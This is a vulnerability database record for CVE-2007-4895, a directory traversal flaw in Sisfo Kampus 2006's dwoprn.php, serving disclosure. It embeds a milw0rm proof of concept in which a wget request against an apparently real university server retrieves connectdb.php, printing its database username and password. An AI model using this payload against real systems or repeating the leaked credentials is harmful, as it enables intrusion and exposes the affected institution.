ID OSVDB:38659
Type osvdb
Reporter OSVDB
Modified 2007-09-10T00:00:00
Description
Manual Testing Notes
http://[target]/[dir]/dwoprn.php?f=connectdb.php
References:
Vendor URL: http://Sisfokampus.net/
Secunia Advisory ID:23109
ISS X-Force ID: 36534
Generic Exploit URL: http://www.milw0rm.com/exploits/4386
CVE-2007-4895
{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nhttp://[target]/[dir]/dwoprn.php?f=connectdb.php\n## References:\nVendor URL: http://Sisfokampus.net/\n[Secunia Advisory ID:23109](https://secuniaresearch.flexerasoftware.com/advisories/23109/)\nISS X-Force ID: 36534\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4386\n[CVE-2007-4895](https://vulners.com/cve/CVE-2007-4895)\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:38659", "modified": "2007-09-10T00:00:00", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4895"]}, {"type": "exploitdb", "idList": ["EDB-ID:4386"]}], "modified": "2017-04-28T13:20:34", "rev": 2}, "vulnersScore": 6.1}, "id": "OSVDB:38659", "title": "Sisfo Kampus dwoprn.php f Variable Traversal Arbitrary File Access", "edition": 1, "published": "2007-09-10T00:00:00", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvelist": ["CVE-2007-4895"], "lastseen": "2017-04-28T13:20:34"}
{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Directory traversal vulnerability in dwoprn.php in Sisfo Kampus 2006 (Semarang 3) allows remote attackers to read arbitrary files via the f parameter.", "edition": 3, "cvss3": {}, "published": "2007-09-14T18:17:00", "title": "CVE-2007-4895", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4895"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:sisfo_kampus:sisfo_kampus:2006"], "id": "CVE-2007-4895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4895", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sisfo_kampus:sisfo_kampus:2006:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:48:37", "description": "Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability. CVE-2007-4895. Webapps exploit for php platform", "published": "2007-09-10T00:00:00", "type": "exploitdb", "title": "Sisfo Kampus 2006 dwoprn.php f Remote File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4895"], "modified": "2007-09-10T00:00:00", "id": "EDB-ID:4386", "href": "https://www.exploit-db.com/exploits/4386/", "sourceData": "original File name : PUPET-SisfoKampus2006.txt\n\ndate releases : September 10, 2007\n\n \n\nInformation :\n\n=========================\n\nAdvisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability\n\nAuthor: k-one A.K.A PUPET\n\nWebsite vendor : http://sisfokampus.net/\n\nProblem : All Local File can downloaded\n\n\nPOC :\n\n=========================\n\n \n\nhttp://[h0sT]/[dir]/dwoprn.php?f=connectdb.php\n\n \n\n \n\n[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php\n\n--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php\n\n => `dwoprn.php?f=connectdb.php'\n\nResolving ***.*****-subang.ac.id... 203.130.***.**\n\nConnecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.\n\nHTTP request sent, awaiting response... 200 OK\n\nLength: 292 [application/dwoprn]\n\n \n\n100%[====================================================================================================================================================================>] 292 --.--K/s\n\n \n\n07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]\n\n \n\n[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php\n\n<?php\n\n // file: connectdb.php\n\n // author: E. Setio Dewo, Maret 2003\n\n \n\n $db_username = \"t26924_siak\";\n\n $db_hostname = \"localhost\";\n\n $db_password = \"siakang\";\n\n $db_name = \"t26924_siak\";\n\n \n\n $con = _connect($db_hostname, $db_username, $db_password);\n\n $db = _select_db($db_name, $con);\n\n \n\n?>\n\nVendor Response:\n\n==============\n\nNot contacted yet\n\n \n\nPatch :\n\n=============\n\nNo Patch Available\n\nThis bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)\n\n# milw0rm.com [2007-09-10]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/4386/"}]}